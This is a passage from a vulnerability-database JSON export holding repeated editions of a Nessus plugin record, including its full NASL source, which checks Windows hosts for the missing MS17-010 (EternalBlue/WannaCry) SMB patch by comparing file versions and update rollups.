value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-010';\nkbs = make_list(\n \"4012212\",\n \"4012213\",\n \"4012214\",\n \"4012215\",\n \"4012216\",\n \"4012217\",\n \"4012606\",\n \"4013198\",\n \"4013429\",\n \"4012598\"\n);\n\nvuln = 0;\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2',vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows Embedded\" >< productname)\n exit(0, \"Nessus does not support bulletin / patch checks for Windows Embedded.\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share))\n audit(AUDIT_SHARE_FAIL, share);\n\nif (\n ##############\n ## MAY 2017 ##\n ##############\n\n # Windows XP SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x64\") ||\n # Windows XP SP3\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"srv.sys\", version:\"5.1.2600.7208\", min_version:\"5.1.2600.5000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x86\") ||\n # Windows Server 2003 SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n # Windows 8\n (\n (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname && \"2012\" >!< productname)\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\")\n )\n ||\n \n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\")\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22137\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\") ||\n\n ##############\n ## MAR 2017 ##\n ##############\n\n # Windows Vista Service Pack 2 / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.19743\", min_version:\"6.0.6002.18000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.24067\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n\n # Windows 7 / Windows Server 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012212, 4012215)) ||\n\n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n smb_check_rollup(os:\"6.2\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012214, 4012217))\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n smb_check_rollup(os:\"6.3\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012213, 4012216)) ||\n\n # Windows 10\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10240\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012606)) ||\n\n # Windows 10 1511\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10586\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013198)) ||\n\n # Windows 10 1607 / Windows Server 2016\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013429))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released a set of patches for Windows Vista, 2008, 7, 2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also released emergency patches for Windows operating systems that are no longer supported, including Windows XP, 2003, and 8.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2017-0148", "vpr": {"risk factor": "Critical", "score": "9.9"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Core Impact", "CANVAS(CANVAS)", "Metasploit(MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption)"]}, "lastseen": "2021-10-06T03:05:04", "differentElements": ["vpr"], "edition": 10}, {"bulletin": {"id": "SMB_NT_MS17-010.NASL", "hash": "b9abd8135dbfca43008678d0346e679b", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)", "description": "The remote Windows host is missing a security update. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-15T00:00:00", "modified": "2019-11-13T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97737", "reporter": "This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?59db5b5b", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://www.nessus.org/u?d9f569cf", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "http://www.nessus.org/u?065561d0", "https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?321523eb", "https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-12T14:05:28", "history": [], "viewCount": 2979, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-27613"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700059.PRM"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96705", "SMNTC-96706", "SMNTC-96704", "SMNTC-96709", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0144", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-12T14:05:28", "rev": 2}, "score": {"value": 8.1, "vector": "NONE", "modified": "2021-10-12T14:05:28", "rev": 2}}, "objectVersion": "1.6", "pluginID": "97737", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97737);\n script_version(\"1.24\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)\");\n script_summary(english:\"Checks the version of the SYS files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-010';\nkbs = make_list(\n \"4012212\",\n \"4012213\",\n \"4012214\",\n \"4012215\",\n \"4012216\",\n \"4012217\",\n \"4012606\",\n \"4013198\",\n \"4013429\",\n \"4012598\"\n);\n\nvuln = 0;\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2',vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows Embedded\" >< productname)\n exit(0, \"Nessus does not support bulletin / patch checks for Windows Embedded.\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share))\n audit(AUDIT_SHARE_FAIL, share);\n\nif (\n ##############\n ## MAY 2017 ##\n ##############\n\n # Windows XP SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x64\") ||\n # Windows XP SP3\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"srv.sys\", version:\"5.1.2600.7208\", min_version:\"5.1.2600.5000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x86\") ||\n # Windows Server 2003 SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n # Windows 8\n (\n (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname && \"2012\" >!< productname)\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\")\n )\n ||\n \n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\")\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22137\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\") ||\n\n ##############\n ## MAR 2017 ##\n ##############\n\n # Windows Vista Service Pack 2 / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.19743\", min_version:\"6.0.6002.18000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.24067\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n\n # Windows 7 / Windows Server 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012212, 4012215)) ||\n\n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n smb_check_rollup(os:\"6.2\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012214, 4012217))\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n smb_check_rollup(os:\"6.3\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012213, 4012216)) ||\n\n # Windows 10\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10240\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012606)) ||\n\n # Windows 10 1511\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10586\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013198)) ||\n\n # Windows 10 1607 / Windows Server 2016\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013429))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released a set of patches for Windows Vista, 2008, 7, 2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also released emergency patches for Windows operating systems that are no longer supported, including Windows XP, 2003, and 8.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2017-0148", "vpr": {"risk factor": "Critical", "score": "9.8"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Core Impact", "CANVAS(CANVAS)", "Metasploit(MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption)"]}, "lastseen": "2021-10-12T14:05:28", "differentElements": ["vpr"], "edition": 11}, {"bulletin": {"id": "SMB_NT_MS17-010.NASL", "hash": "c3cfbf804787e9c7754f38fc5f836f24", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) 